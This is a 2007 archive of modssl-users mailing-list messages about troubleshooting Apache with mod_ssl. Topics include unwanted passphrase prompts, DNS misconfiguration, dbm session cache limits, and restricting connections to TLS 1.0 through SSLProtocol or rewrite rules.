	for ; Tue, 19 Jun 2007 19:36:22 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5JHZQUh089527
	for ; Tue, 19 Jun 2007 11:35:27 -0600 (MDT)
Message-ID: <467813D9.6010406@allez-oop.net>
Date: Tue, 19 Jun 2007 11:35:21 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl
References: <3901F85E21D7EE44AC427250A221A53B065B166B@vegas.vormetric.com>
In-Reply-To: <3901F85E21D7EE44AC427250A221A53B065B166B@vegas.vormetric.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are you quite certain that the LoadModule for mod_ssl has been
commented out?  The reason I ask: the output from 'apachectl start'
which you provided below shows 'mod_ssl/2.2.4'.

In the log file /opt/apache-2.2.4/logs/error_log, on lines that contain
'Apache/2.2.4' and 'configured -- resuming normal operations', do
you see 'mod_ssl/2.2.4'?  If so, it is still being loaded from somewhere
in your configuration.

Saikat Saha wrote:
> Sorry for late response on this one. This is what we have in httpd.conf
> which is generated at compile time. This problem does not go away even
> if I comment out last four lines and restart apache. Could you please
> advise what else could be leading apache to think it is https rather
> than http?
> 
> 
> 
> # Secure (SSL/TLS) connections
> #Include conf/extra/httpd-ssl.conf
> #
> # Note: The following must must be present to support
> #       starting without SSL on platforms with no /dev/random equivalent
> #       but a statically compiled-in mod_ssl.
> #
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
> 
> 
> With above commented out, when I try to start apache, I get following
> passphrase prompt and apache does not start even after saying passphrase
> successful, no logs in logs directory although log level is "debug"
> 
> ]# ./apachectl start
> httpd: Could not reliably determine the server's fully qualified domain
> name, using 10.3.110.109 for ServerName
> Apache/2.2.4 mod_ssl/2.2.4 (Pass Phrase Dialog)
> Some of your private key files are encrypted for security reasons.
> In order to read them you have to provide the pass phrases.
> 
> Server 10.3.110.109:443 (RSA)
> Enter pass phrase:
> 
> OK: Pass Phrase Dialog successful.
> [root@rh4_109 bin]#
> 
> Thanks you very much for your help.
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: Monday, June 18, 2007 8:34 AM
> To: modssl-users@modssl.org
> Subject: Re: Apache with mod_ssl
> 
> Do you have  tags surrounding all
> SSL directives in your configuration file?  For example:
> 
> 
> SSLPassPhraseDialog  builtin
> # etc.
> 
> 
> Saikat Saha wrote:_module>
>> Apache was compiled as below
>>
>> ./configure --with-ldap --enable-mods-shared="all ssl ldap cache proxy
>> authn_alias mem_cache file_cache authnz_ldap charset_lite dav_lock
>> disk_cache" --prefix=/opt/apache-2.2.4
>>
>> Httpd -l gives below
>> [root@rh4_109 bin]# httpd -l
>> Compiled in modules:
>>   core.c
>>   prefork.c
>>   http_core.c
>>   mod_so.c
>>
>> How do I compile so that it does not load mod_ssl automatically and
>> loads only if httpd.conf is configured.
>>
>> Surprisingly there are no error logs even at debug level.
>>
>> Thank you so very much for the kind help.
>>
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
>> Sent: Friday, June 15, 2007 4:13 PM
>> To: modssl-users@modssl.org
>> Subject: Re: Apache with mod_ssl
>>
>> Saikat Saha wrote:
>>> We have apache 2.2.4 compiled with all modules but commented out all 
>>> load modules. Do not have anything in httpd.conf file to state that
>> this 
>>> is https. But when I start apache, it tries to goto https and prompts
> 
>>> for pass phrase. How does apache determine that this is https whereas
> 
>>> this is actually a http server.
>> Perhaps mod_ssl is a compiled-in module.  Run 'httpd -l' to check
> this.
>>> After I enter a passphrase, it shows 
>>> successful but the server never starts up. Can someone please help?
>> The reason probably can be found in Apache's error_log file.
>>
>>> Also can apache support both http and https at different ports at the
> 
>>> same time?
>> Yes.  The defaults are port 80 for http and port 443 for https.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 20 13:24:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CD06914D8B5; Wed, 20 Jun 2007 13:24:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 6302F14D83E
	for ; Wed, 20 Jun 2007 13:24:05 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly29e.srv.mailcontrol.com (MailControl) with ESMTP id l5KBMxsM020835
	for ; Wed, 20 Jun 2007 12:23:01 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Wed, 20 Jun 2007 11:38:58 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314738@clotho.retainagroup.com>
In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC314736@clotho.retainagroup.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AceyjzcOqMgcBXKwTOmXEGeH33uDAAAANIogACWmuvA=
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.139
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just to let you all know I spoke to the domain name hosting company and
the DNS setting wasn't correct. Traffic is forwarded to our server but
our A name record didn't point to the correct ip address of the web
server and tech support was surprised it was working.

Will update the A name record and hopefully all should work !!!

Thanks for the replies !!!

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Rob Archer
Sent: 19 June 2007 17:37
To: modssl-users@modssl.org
Subject: RE: SSL by Domain Name Error


I'll have a word with them tomorrow see what they say !!!

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 19 June 2007 17:28
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


I'll bet you're right when you say your provider may not be forwarding
https requests properly.  I'd run this one past them and see what they
have to say about it.

Rob Archer wrote:
> When accessing it by ip address using the debug option of openssl it
> returns what you would expect (i.e. the text of the key certificate).
>=20
> When accessing by domain name it says :-
>=20
> Loading 'screen' into random state - done
> Connect: bad file descriptor
> Connect:errno=3D10060
>=20
>=20
> I assume this is the equivalent of the "Internet Explorer cannot
> display the webpage" error in IE !!!
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 19 June 2007 17:07
> To: modssl-users@modssl.org
> Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>=20
>> No entry for https and domain name in the access.log and a "Internet=20
>> Explorer cannot display the webpage" in ie when trying to get to the=20
>> server.
>=20
> Do you have access to the openssl command line program?
> It would tell you whether you are making a connection, and possibly
> shed some light on the problem.  Like this:
>=20
> openssl s_client -connect www.mydomain.com:443 -debug
> GET /

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
NoIrNOBa4kXlVepWQxhvS70n7wnaGifHgxpDYH9XzgnhdWNGqAEoj0QjdX2jmb6nMJ8gJruT
33EzOK5GVXfbNyKb+LzKW!I6Mmqa51c3EUWCLSmoTIRNb1cRcyi5C3p!RNtjA2lYb5YgUOqG
mlb5L!FRO2AUfWDh4BWlXfwQkELAaC8nK3p6uY3  to report this email as spam.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 20 16:29:55 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 27CD314D88F; Wed, 20 Jun 2007 16:29:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id AAF1614D83E
	for ; Wed, 20 Jun 2007 16:29:54 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 20 Jun 2007 10:28:58 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.16,443,1175486400"; 
   d="scan'208"; a="34355551:sNHT18486797"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 20 Jun 2007 10:28:58 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: dbm Session Cache
Date: Wed, 20 Jun 2007 10:28:57 -0400
Message-ID: 
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: dbm Session Cache
Thread-Index: Acex7s31Kb7z93mkQ4SoPSbm/keVpgBV7/Gg
References: 
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 20 Jun 2007 14:28:58.0795 (UTC) FILETIME=[570E3FB0:01C7B347]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


>=20
> I am running Apache 2.0.59 with mod_ssl on Windows Server 2003 and am
> noticing that dbm session caching is not working.
>=20
> With the following configuration option:
>=20
> SSLSessionCache dbm:logs/ssl-scache.log
>=20
> The DIR/PAG files are created, but they are always size zero, and the
> server never reuses sessions when requested by the client.
>=20
> I'm seeing this error message in the logs - any suggestions?
>=20
> [Mon Jun 18 13:55:49 2007] [debug] ssl_scache_dbm.c(134): data size
too
> large for DBM session cache: 957 >=3D 950
>=20
> Are other cache storage types preferable to dbm?  I tried shmcb and it
> works fine - perhaps I should just stick with shm?
>=20

It appears the problem is client authentication.  With it turned on, the
dbm cache simply cannot handle the entry size.

Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 00:43:13 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E0DB314D895; Thu, 21 Jun 2007 00:43:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id 985C914D83F
	for ; Thu, 21 Jun 2007 00:43:11 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 20 Jun 2007 18:42:16 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.16,444,1175486400"; 
   d="scan'208"; a="34429854:sNHT16527224"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 20 Jun 2007 18:42:16 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: TLS 1.0 Backing Down to SSL 3.0
Date: Wed, 20 Jun 2007 18:42:22 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: TLS 1.0 Backing Down to SSL 3.0
Thread-Index: AcezjESFejYg20ouTHSD9K++FTeupw==
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 20 Jun 2007 22:42:16.0419 (UTC) FILETIME=[409D4330:01C7B38C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm trying to configure my Apache 2.0.59 server w/ mod_ssl to use TLS
1.0 only.  I have set the SSLCipherSuite accordingly, however when I
connect with IE6 with SSLv3 enabled and TLSv1 disabled, I still get
through because of the TLS ability to back down to SSL 3.0.  Is there a
way to disable this behavior in the configuration?

Thanks,
Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 09:54:51 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2318614D895; Thu, 21 Jun 2007 09:54:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id A992414D83F
	for ; Thu, 21 Jun 2007 09:54:50 +0200 (CEST)
Received: from werum815.werum.net (mailsmtp1.werum.net [172.20.104.15])
	by mx1.werum.de (Postfix) with ESMTP id 9A2A631A907
	for ; Thu, 21 Jun 2007 09:53:55 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id D2BF29335A;
	Thu, 21 Jun 2007 09:53:23 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 18918-06; Thu, 21 Jun 2007 09:50:48 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 0DA4A93341
	for ; Thu, 21 Jun 2007 09:53:23 +0200 (CEST)
Message-ID: <467A2E71.9000105@werum.de>
Date: Thu, 21 Jun 2007 09:53:21 +0200
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.4 (Windows/20070604)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: TLS 1.0 Backing Down to SSL 3.0
References: 
In-Reply-To: 
X-Enigmail-Version: 0.95.1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.254 tagged_above=-999 required=3 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Fought, Richard schrieb:
> I'm trying to configure my Apache 2.0.59 server w/ mod_ssl to use TLS
> 1.0 only.  I have set the SSLCipherSuite accordingly, however when I
> connect with IE6 with SSLv3 enabled and TLSv1 disabled, I still get
> through because of the TLS ability to back down to SSL 3.0.  Is there a
> way to disable this behavior in the configuration?

Hi Richard,

if no config rules work maybe the fastest way to achive your goal are
redirects depending on the current client protocol spoken. For
example, redirecting every browser not communicating via TLS to an
extra error page:

SSLOptions +StdEnvVars
RewriteEngine on
RewriteCond %{SSL:SSL_PROTOCOL} !TLSv1
RewriteCond %{REQUEST_URI} !^/error/.*$
RewriteRule .* /error/no_tls_encryption.html [R,L]

Did not test this myself, see further details on
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC25 and
http://httpd.apache.org/docs/2.2/de/mod/mod_rewrite.html#rewritecond

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 16:30:44 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5D60814D88C; Thu, 21 Jun 2007 16:30:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id A4AE714D83F
	for ; Thu, 21 Jun 2007 16:30:40 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.7/8.12.11) with ESMTP id l5LEYJOS005923;
	Thu, 21 Jun 2007 10:34:19 -0400
Date: Thu, 21 Jun 2007 10:34:14 -0400 (EDT)
From: "R. DuFresne" 
To: Mark Beiley 
cc: modssl-users@modssl.org
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
In-Reply-To: <9A1B5237A0904F92848CD1A919D1C616@MarkE1505>
Message-ID: 
References:  <466802CF.2020407@aeccom.com>
 <548AB84654B543B1B2499B3F2C8686F8@MarkE1505> <4668F791.5040605@aeccom.com>
 <9A1B5237A0904F92848CD1A919D1C616@MarkE1505>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Mon, 11 Jun 2007, Mark Beiley wrote:

> I've learned that I can fix this problem by not using an external style 
> sheet.
> This only affects IE6 on XP without SP2.  Everyone else seems to be able
> to view my pages fine, and even these problematic IE6/XP customers can view
> pages with external style sheets that are not using HTTPS.




>


There are really idiots using XP without SP2?  Damn!


Thanks,


Ron DuFresne
- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFGeoxqst+vzJSwZikRAimeAJ9TaRtg2S4RYPSGjsho9oI+DIkp9QCfZLgv
L0UtGwP46PoAop7cqTs6G+E=
=N1Ne
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 17:12:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5657114D894; Thu, 21 Jun 2007 17:12:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20])
	by master.modssl.org (Postfix) with ESMTP id D87F514D83F
	for ; Thu, 21 Jun 2007 17:12:14 +0200 (CEST)
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 21 Jun 2007 11:11:17 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.16,448,1175486400"; 
   d="scan'208"; a="34521538:sNHT17603236"
Received: from HQ-EXVS02.anteon.com ([10.170.1.143]) by HQ-EXOUT01.anteon.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 21 Jun 2007 11:11:18 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: TLS 1.0 Backing Down to SSL 3.0
Date: Thu, 21 Jun 2007 11:11:16 -0400
Message-ID: 
In-Reply-To: <467A2E71.9000105@werum.de>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: TLS 1.0 Backing Down to SSL 3.0
Thread-Index: Acez2Vn2Aoo1JVH0TACnNhmuNkIYGgAOCsGw
References:  <467A2E71.9000105@werum.de>
From: "Fought, Richard" 
To: 
X-OriginalArrivalTime: 21 Jun 2007 15:11:18.0158 (UTC) FILETIME=[6B0C0AE0:01C7B416]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Fought, Richard" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



>=20
> Hi Richard,
>=20
> if no config rules work maybe the fastest way to achive your goal are
> redirects depending on the current client protocol spoken. For
> example, redirecting every browser not communicating via TLS to an
> extra error page:
>=20
> SSLOptions +StdEnvVars
> RewriteEngine on
> RewriteCond %{SSL:SSL_PROTOCOL} !TLSv1
> RewriteCond %{REQUEST_URI} !^/error/.*$
> RewriteRule .* /error/no_tls_encryption.html [R,L]
>=20
> Did not test this myself, see further details on
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC25 and
> http://httpd.apache.org/docs/2.2/de/mod/mod_rewrite.html#rewritecond
>=20
> Greetings from Germany,
> Eckard
> ______________________________________________________________________

Eckard,

Thanks for the excellent suggestion but I found the solution.  I was
focusing on SSLCipherSuite so much that I completely missed the
SSLProtocol directive.  It is not included in the default config and
thus apparently defaults to all.  Setting this to TLSv1 only yields the
expected results - clients are not allowed to connect.

Your solution does present a more elegant result in that this page can
be used to inform the user that they need to enable TLSv1 in their
browser, or use one that supports TLS.

Regards,
Rich
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 20:06:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6635D14D8B5; Thu, 21 Jun 2007 20:06:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id BC2E914D83F
	for ; Thu, 21 Jun 2007 20:06:47 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.7/8.12.11) with ESMTP id l5LIAPAI006634
	for ; Thu, 21 Jun 2007 14:10:29 -0400
Date: Thu, 21 Jun 2007 14:10:21 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error
In-Reply-To: <46780428.3090407@allez-oop.net>
Message-ID: 
References: <59D4AF29ACE8044BB4C34C36A08A03AC314735@clotho.retainagroup.com>
 <46780428.3090407@allez-oop.net>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



more likely www.mydomain.com is not in DNS, perhaps trying this works:

https://mydomain.com

If that works it is DNS issues.

Thanks,

Ron DuFresne


On Tue, 19 Jun 2007, Omar W. Hannet wrote:

> I'll bet you're right when you say your provider may not be
> forwarding https requests properly.  I'd run this one past
> them and see what they have to say about it.
>
> Rob Archer wrote:
>> When accessing it by ip address using the debug option of openssl it
>> returns what you would expect (i.e. the text of the key certificate).
>> 
>> When accessing by domain name it says :-
>> 
>> Loading 'screen' into random state - done
>> Connect: bad file descriptor
>> Connect:errno=10060
>> 
>> 
>> I assume this is the equivalent of the "Internet Explorer cannot display
>> the webpage" error in IE !!!
>> 
>> 
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
>> Sent: 19 June 2007 17:07
>> To: modssl-users@modssl.org
>> Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
>> 
>> 
>> Rob Archer wrote:
>> 
>>> No entry for https and domain name in the access.log and a "Internet 
>>> Explorer cannot display the webpage" in ie when trying to get to the 
>>> server.
>> 
>> Do you have access to the openssl command line program?
>> It would tell you whether you are making a connection, and possibly shed
>> some light on the problem.  Like this:
>> 
>> openssl s_client -connect www.mydomain.com:443 -debug
>> GET /
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFGer8Qst+vzJSwZikRAqLUAKDUuvO8OPDrUqBCSRcVBzIMqQqD3QCgkknb
OfdmiAQeSnhLiCJFg4hsVlQ=
=ItZS
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 21 20:09:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0070E14D9DD; Thu, 21 Jun 2007 20:09:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id 6F1FA14D89A
	for ; Thu, 21 Jun 2007 20:09:27 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.7/8.12.11) with ESMTP id l5LID8nZ006656;
	Thu, 21 Jun 2007 14:13:08 -0400
Date: Thu, 21 Jun 2007 14:13:05 -0400 (EDT)
From: "R. DuFresne" 
To: "Omar W. Hannet" 
cc: modssl-users@modssl.org
Subject: Re: Apache with mod_ssl
In-Reply-To: <467813D9.6010406@allez-oop.net>
Message-ID: 
References: <3901F85E21D7EE44AC427250A221A53B065B166B@vegas.vormetric.com>
 <467813D9.6010406@allez-oop.net>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Even more revealing was the passphrase prompt, not required for plain 
httpd...


Thanks,

Ron DuFresne


On Tue, 19 Jun 2007, Omar W. Hannet wrote:

> Are you quite certain that the LoadModule for mod_ssl has been
> commented out?  The reason I ask: the output from 'apachectl start'
> which you provided below shows 'mod_ssl/2.2.4'.
>
> In the log file /opt/apache-2.2.4/logs/error_log, on lines that contain
> 'Apache/2.2.4' and 'configured -- resuming normal operations', do
> you see 'mod_ssl/2.2.4'?  If so, it is still being loaded from somewhere
> in your configuration.
>
> Saikat Saha wrote:
>> Sorry for late response on this one. This is what we have in httpd.conf
>> which is generated at compile time. This problem does not go away even
>> if I comment out last four lines and restart apache. Could you please
>> advise what else could be leading apache to think it is https rather
